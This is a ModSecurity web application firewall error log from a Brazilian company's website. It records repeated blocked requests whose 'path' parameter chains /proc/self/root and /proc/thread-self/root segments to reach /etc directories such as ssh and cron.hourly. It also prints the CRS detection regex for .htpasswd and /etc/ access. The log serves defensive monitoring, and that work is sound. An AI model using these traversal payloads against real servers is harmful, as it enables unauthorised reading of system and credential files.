[Mon Mar 16 10:11:27.916466 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:54426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBf_9ocpUE4ed4uDzeoAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:29.078301 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.243.203:54430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBgf9ocpUE4ed4uDzeoQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:30.445345 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:39600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBgo6lpbStxTqkSktf0QAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:31.739067 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:39608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBgwlT9VtDQc7bgUydrwAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:33.045474 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:39620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBhXjZBu2q05ozVU9G_gAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:34.314211 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:39636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBhpqj1wV0Si-OkefagQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:36.641483 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:39646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBiJqj1wV0Si-OkefagwAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:37.898515 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.243.203:39650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBiXbQATo66fKoS7w-3gAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:39.291401 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:39658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBi7ysWC90G-1nBrA2CwAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:40.573764 2026] [:error] [pid 10709:tid 140411716749056] [client 74.7.243.203:40376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBjBXjF1vJNtV6CWrqewAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:44.110163 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:40382] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBkAlT9VtDQc7bgUydswAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:57.209904 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:40390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBnf9ocpUE4ed4uDzetwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:12:21.860789 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:55238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBtbABkC4fWIHEf8HcaQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:12:39.181563 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:54536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBx46lpbStxTqkSktf7gAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:12:47.883905 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:36980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBz46lpbStxTqkSktf9gAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:12:53.715092 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:36996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgB1f9ocpUE4ed4uDze6AAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:13:05.345870 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:58586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgB4dSswJuvopo3lOhRrwAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:13:08.399063 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:50270] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgB5NSswJuvopo3lOhRsgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:13:09.403093 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:45646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgB5bysWC90G-1nBrA2ngAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:13:09.698925 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:50286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgB5f9ocpUE4ed4uDze-AAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:13:21.789978 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.244.31:41134] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgB8QlT9VtDQc7bgUydxwAAARg"]
[Mon Mar 16 10:13:25.084119 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:35788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgB9dSswJuvopo3lOhRxAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
